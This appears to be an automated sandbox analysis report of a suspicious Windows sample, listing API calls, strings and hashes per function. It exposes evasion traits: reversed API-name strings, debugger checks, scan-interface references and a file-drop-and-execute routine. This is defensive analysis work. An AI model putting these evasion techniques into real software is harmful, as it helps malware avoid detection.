Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: Kernel32$sserddAcorPteG
API String ID: 667068680-1372893251
Opcode ID: d3dc14a3ccb30e119affef5562b8ccc4f1f27f984d1176fc9e7c61fa58cd84a2
Instruction ID: d5ce6bcf51e881f3f29a0fa9e4239e4a18b3d80fe0d03a1f1624b710571a8184
Opcode Fuzzy Hash: d3dc14a3ccb30e119affef5562b8ccc4f1f27f984d1176fc9e7c61fa58cd84a2
Instruction Fuzzy Hash: 3001FF78680304BFEB05EBA4ED91E5EB7AEFB4DB10F6144A0E900D7680DE74A911CA65

Function 02A0AA50 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02A0AAE7,?,?,00000000), ref: 02A0AA68

Part of subcall function 02A0A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02A0A7E2

GetThreadLocale.KERNEL32(00000000,00000004,00000000,02A0AAE7,?,?,00000000), ref: 02A0AA98
EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02A0AAA3
GetThreadLocale.KERNEL32(00000000,00000003,00000000,02A0AAE7,?,?,00000000), ref: 02A0AAC1
EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02A0AACC

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: a1d46be3bafefbaf4a41628b4586cf9c7fb236e2a3c3aaeb0aeb8da3f453535f
Instruction ID: ae26f15bb368818537705fed57b2af55a191ce4fcfa6ca98751730550057e52c
Opcode Fuzzy Hash: a1d46be3bafefbaf4a41628b4586cf9c7fb236e2a3c3aaeb0aeb8da3f453535f
Instruction Fuzzy Hash: D30142B03803047FF711FAA4EEE1B6B335DEB86B24F500120E200E66C1DE759E108A64

Function 02A0AB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02A0ACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02A0AB2F

Part of subcall function 02A0A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02A0A7E2

Strings

eeee, xrefs: 02A0AC3E
ggg, xrefs: 02A0AC15
yyyy, xrefs: 02A0AC25

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: 3862e873c866027ba1b95b2e49b40183b2cc7294b302e8d0bf860d48432974bb
Instruction ID: c34f1baf1392161a06e2a31f47d3ff32b69392cd6d8062b0a02d759fc4349b61
Opcode Fuzzy Hash: 3862e873c866027ba1b95b2e49b40183b2cc7294b302e8d0bf860d48432974bb
Instruction Fuzzy Hash: 7841C0717443048BD711EBB9B9D06BEB2EBEB8A304B164525D752C33C6EE34ED01CA65

Function 02A181CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A1823C,?,?,00000000,?,02A17A7E,ntdll,00000000,00000000,02A17AC3,?,?,00000000), ref: 02A1820A

Part of subcall function 02A18274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A182FC,?,?,00000000,00000000,?,02A18215,00000000,KernelBASE,00000000,00000000,02A1823C), ref: 02A182C1
Part of subcall function 02A18274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A182C7
Part of subcall function 02A18274: GetProcAddress.KERNEL32(?,?), ref: 02A182D9

GetModuleHandleA.KERNELBASE(?), ref: 02A1821E

Strings

KernelBASE, xrefs: 02A18205
AeldnaHeludoMteG, xrefs: 02A181E5

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: HandleModule$AddressProc
String ID: AeldnaHeludoMteG$KernelBASE
API String ID: 1883125708-1952140341
Opcode ID: 2c904fbd25966e3cbb27b562810fa781cd9f55fb9ee14477c430549ed04d3b68
Instruction ID: 35ea500ff622f4238f69de51c0d541c0471e32e2c77faa24cab2ba24406d3467
Opcode Fuzzy Hash: 2c904fbd25966e3cbb27b562810fa781cd9f55fb9ee14477c430549ed04d3b68
Instruction Fuzzy Hash: 26F0C274A80704AFE705EBA4ED81D59F7EDF74D75076104A0E80083640DE34AE108925

Function 02A1F6E8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KernelBase,?,02A1FAEB,UacInitialize,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,ScanBuffer,02A87380,02A2B7B8,ScanString,02A87380,02A2B7B8,Initialize), ref: 02A1F6EE
GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02A1F700

Strings

IsDebuggerPresent, xrefs: 02A1F6FA
KernelBase, xrefs: 02A1F6E9

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsDebuggerPresent$KernelBase
API String ID: 1646373207-2367923768
Opcode ID: 1571af695955da0e47cc27398ca98e81d6c565402682449bc868c1ec6a989f68
Instruction ID: 27f16d7a1c860ef79e43c39f44e3ec24cd5ad8e407c790b9ba49221fd5c82ce1
Opcode Fuzzy Hash: 1571af695955da0e47cc27398ca98e81d6c565402682449bc868c1ec6a989f68
Instruction Fuzzy Hash: 09D012A13943906EFE0472F43CC4819038C9D54A3D7240F20B026D64D2FEA688265024

Function 02A0C474 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,02A2D10B,00000000,02A2D11E), ref: 02A0C47A
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02A0C48B

Strings

GetDiskFreeSpaceExA, xrefs: 02A0C485
kernel32.dll, xrefs: 02A0C475

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 9816cbdaea9fc75afd2a4d76a849558505d5b04381ac036fa202c387c8fc73a4
Instruction ID: b44927eea57e7105e501879e515ae96a85a4fb1429f5c759921e82317045cea8
Opcode Fuzzy Hash: 9816cbdaea9fc75afd2a4d76a849558505d5b04381ac036fa202c387c8fc73a4
Instruction Fuzzy Hash: 3BD05EA0A803846BE610ABB97DC867122DEB328B24F008927E501451C1EF77A8A58F14

Function 02A0E1E8 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02A0E297
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02A0E2B3
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02A0E32A
VariantClear.OLEAUT32(?), ref: 02A0E353

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction ID: b3787cd8e579944d307083c22dfadc67568b41d07711dc8dfb49db1b53079ce1
Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction Fuzzy Hash: 0A411A75A416299FCB62DF58DED0BC9B3BDAF4C314F0049D5E548A7291DA30AF809F50

Function 02A0AD3C Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02A0AD59
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02A0AD7D
GetModuleFileNameA.KERNEL32(02A00000,?,00000105), ref: 02A0AD98
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02A0AE2E

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: dcd2b77dec06f2cd6c72ef983a46a3d07ef5c7652568895ef45fd8eb98cc9c4f
Instruction ID: 0c8b825bb0581fd4547e5113868745f2a5d42f265d3176ba1393c05db0ba9e55
Opcode Fuzzy Hash: dcd2b77dec06f2cd6c72ef983a46a3d07ef5c7652568895ef45fd8eb98cc9c4f
Instruction Fuzzy Hash: 68411871A403589BDB21DB68EDC4BDAB7FDAB08700F4404E5A648E7281DF74AF948F54

Function 02A0AD3A Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02A0AD59
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02A0AD7D
GetModuleFileNameA.KERNEL32(02A00000,?,00000105), ref: 02A0AD98
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02A0AE2E

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 33f7e55ecaea731ef515f40b5dbb641033f89fefbc699adb233a55a322c5ad96
Instruction ID: 1887716bb46c5e71d5c4cff7b8392d687fce7ed2d5c270e121abfe2862420301
Opcode Fuzzy Hash: 33f7e55ecaea731ef515f40b5dbb641033f89fefbc699adb233a55a322c5ad96
Instruction Fuzzy Hash: 84412871A403589BDB21DB68EDC4BDAB7FDAB08700F4404E5A648E7282DF74AF948F54

Function 02A01C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdc84e40527b9d58a1dbda3754e9afbc048355ae79fcc285dbf07b4e24c2b966
Instruction ID: d18fa3b4154e0a19e5138d297370563d4054bec7a1cf9aeb88e654108f321e6f
Opcode Fuzzy Hash: bdc84e40527b9d58a1dbda3754e9afbc048355ae79fcc285dbf07b4e24c2b966
Instruction Fuzzy Hash: 72A1C2A67506004BD718AA7DBDC43FDB3D69B84325F18427EE11DCB2C1EF68C9528650

Function 02A094EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02A095DA), ref: 02A09572
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02A095DA), ref: 02A09578

Strings

yyyy, xrefs: 02A0954D

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: 7691408d704edf4ee3329946438444a0ae3500562b60c457fdf7eb97e2fa7a6c
Instruction ID: c291587d669a54aca8a534e3efee77bb989105aa9f056f2f187c23a2a1182b19
Opcode Fuzzy Hash: 7691408d704edf4ee3329946438444a0ae3500562b60c457fdf7eb97e2fa7a6c
Instruction Fuzzy Hash: E1218071A002589FDB10DFA5E9D1AAEB3B9FF08B00F4000A5E905E72D1DF30AE44CB65

Function 02A18338 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 02A181CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A1823C,?,?,00000000,?,02A17A7E,ntdll,00000000,00000000,02A17AC3,?,?,00000000), ref: 02A1820A
Part of subcall function 02A181CC: GetModuleHandleA.KERNELBASE(?), ref: 02A1821E

Part of subcall function 02A18274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A182FC,?,?,00000000,00000000,?,02A18215,00000000,KernelBASE,00000000,00000000,02A1823C), ref: 02A182C1
Part of subcall function 02A18274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A182C7
Part of subcall function 02A18274: GetProcAddress.KERNEL32(?,?), ref: 02A182D9

FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02A183C2), ref: 02A183A4

Strings

FlushInstructionCache, xrefs: 02A18351
Kernel32, xrefs: 02A18383

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$CacheFlushInstruction
String ID: FlushInstructionCache$Kernel32
API String ID: 3811539418-184458249
Opcode ID: d1fefd84c3b74be22dfffc68582af65d852d13bd8af47ba32c8b4667c01e3e71
Instruction ID: 56d521d112ce168ca143b203ee116beb9e8327885ea70868cf12ea6af896666f
Opcode Fuzzy Hash: d1fefd84c3b74be22dfffc68582af65d852d13bd8af47ba32c8b4667c01e3e71
Instruction Fuzzy Hash: 25016D75680304BFF700EFA4ED81F5AB7ADF708B10F6144A0FA04D6680DE78ED108A25

Function 02A1AF24 Relevance: 5.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 02A1AF58
IsBadWritePtr.KERNEL32(?,00000004), ref: 02A1AF88
IsBadReadPtr.KERNEL32(?,00000008), ref: 02A1AFA7
IsBadReadPtr.KERNEL32(?,00000004), ref: 02A1AFB3

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: Read$Write
String ID:
API String ID: 3448952669-0
Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
Instruction ID: a523e86e2fd4ec42c316538d5db496c5187789e11c66c08de2d43a6c2ec0b181
Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
Instruction Fuzzy Hash: 4E2190B264161A9BDB10DF69DDC0BAE73AAEF40775F008512FD14D7285DF34E811CAA0

Analysis Process: lxsyrsiW.pifPID: 4676, Parent PID: 4424COMMON

Execution Graph

Execution Coverage:	25%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	13.9%
Total number of Nodes:	36
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0040108C Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 207
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004010A6
memset.MSVCRT ref: 004010EE
strcmp.MSVCRT ref: 00401180
strcpy.MSVCRT(?,00000000), ref: 004011CE
EntryPoint.LXSYRSIW(?,?), ref: 004011BE

Part of subcall function 00401000: malloc.MSVCRT ref: 0040100F

EntryPoint.LXSYRSIW(?,?), ref: 00401202
getenv.MSVCRT ref: 0040120B
EntryPoint.LXSYRSIW(?,?), ref: 00401246
sprintf.MSVCRT ref: 00401263
fopen.MSVCRT ref: 00401278
EntryPoint.LXSYRSIW(?,?), ref: 004012B3
fwrite.MSVCRT ref: 004012DD
fclose.MSVCRT ref: 004012EC
EntryPoint.LXSYRSIW(00477C65,00000004), ref: 0040131C
ShellExecuteA.SHELL32(00000000,00000000,?,0000000A,0000000A,0000000A), ref: 00401344

Strings

%s\%s, xrefs: 00401256, 0040125B

Memory Dump Source

Source File: 0000000C.00000001.1507190833.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000001.1507190833.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000001.1507190833.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_1_400000_lxsyrsiW.jbxd

Similarity

API ID: EntryPoint$memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
String ID: %s\%s
API String ID: 2742963760-4073750446
Opcode ID: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
Instruction ID: 7e0938a0f735226449982c757e1a15bee8303af7c1bff0ef3dea70518ca31291
Opcode Fuzzy Hash: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
Instruction Fuzzy Hash: 9971F4F1E001049BDB54DB9CDC81B9E77B9DB48309F04417AF60AFB391E639AA448B59

Function 00401155 Relevance: 13.6, APIs: 9, Instructions: 113
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strcmp.MSVCRT ref: 00401180
strcpy.MSVCRT(?,00000000), ref: 004011CE
EntryPoint.LXSYRSIW(?,?), ref: 004011BE

Part of subcall function 00401000: malloc.MSVCRT ref: 0040100F

EntryPoint.LXSYRSIW(?,?), ref: 00401202
getenv.MSVCRT ref: 0040120B
EntryPoint.LXSYRSIW(?,?), ref: 00401246
sprintf.MSVCRT ref: 00401263
fopen.MSVCRT ref: 00401278
EntryPoint.LXSYRSIW(?,?), ref: 004012B3
fwrite.MSVCRT ref: 004012DD
fclose.MSVCRT ref: 004012EC
EntryPoint.LXSYRSIW(00477C65,00000004), ref: 0040131C
ShellExecuteA.SHELL32(00000000,00000000,?,0000000A,0000000A,0000000A), ref: 00401344

Memory Dump Source

Source File: 0000000C.00000001.1507190833.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000001.1507190833.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000001.1507190833.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_1_400000_lxsyrsiW.jbxd

Similarity

API ID: EntryPoint$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
String ID:
API String ID: 2992075992-0
Opcode ID: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
Instruction ID: da6ba3fb88c20024e61c29d0d1421e634aa01f37861d58f563f893074dd25450
Opcode Fuzzy Hash: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
Instruction Fuzzy Hash: F54135F0E101049BDB58DB58DC91B9D77B9DB44309F0441BAF60AFB391E63CAA88CB59

Function 00401475 Relevance: 7.6, APIs: 5, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040148F
__set_app_type.MSVCRT ref: 004014A8
_controlfp.MSVCRT ref: 004014BC
__getmainargs.MSVCRT ref: 004014EA
exit.MSVCRT ref: 0040151C

Memory Dump Source

Source File: 0000000C.00000001.1507190833.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000001.1507190833.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000001.1507190833.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_1_400000_lxsyrsiW.jbxd

Similarity

API ID: __getmainargs__set_app_type_controlfpexitmemset
String ID:
API String ID: 1611591150-0
Opcode ID: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
Instruction ID: 9bdd3bf799432f41f787d58fcaaf5403f241b1bf87296188f28308fcf3b5ab6f
Opcode Fuzzy Hash: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
Instruction Fuzzy Hash: CA110CF5E00104AFCB01EBB8EC85F4A77ACA74C304F50447AB909E7361E979EA448769

Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 0040100F

Strings

j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv, xrefs: 0040106E

Memory Dump Source

Source File: 0000000C.00000001.1507190833.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000001.1507190833.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000001.1507190833.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_1_400000_lxsyrsiW.jbxd

Similarity

API ID: malloc
String ID: j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv
API String ID: 2803490479-2443507578
Opcode ID: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
Instruction ID: 9430970044b5224a9c12c246655217461080a0914b4116f12426152c687b188d
Opcode Fuzzy Hash: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45

Function 004013FF Relevance: 2.5, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D`GuD`Gu, xrefs: 00401438, 0040143D
D`GuD`Gu, xrefs: 00401411, 00401414

Memory Dump Source

Source File: 0000000C.00000001.1507190833.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000001.1507190833.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000001.1507190833.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_1_400000_lxsyrsiW.jbxd

Similarity

API ID: memset$EntryPointfopenstrcmpstrcpy
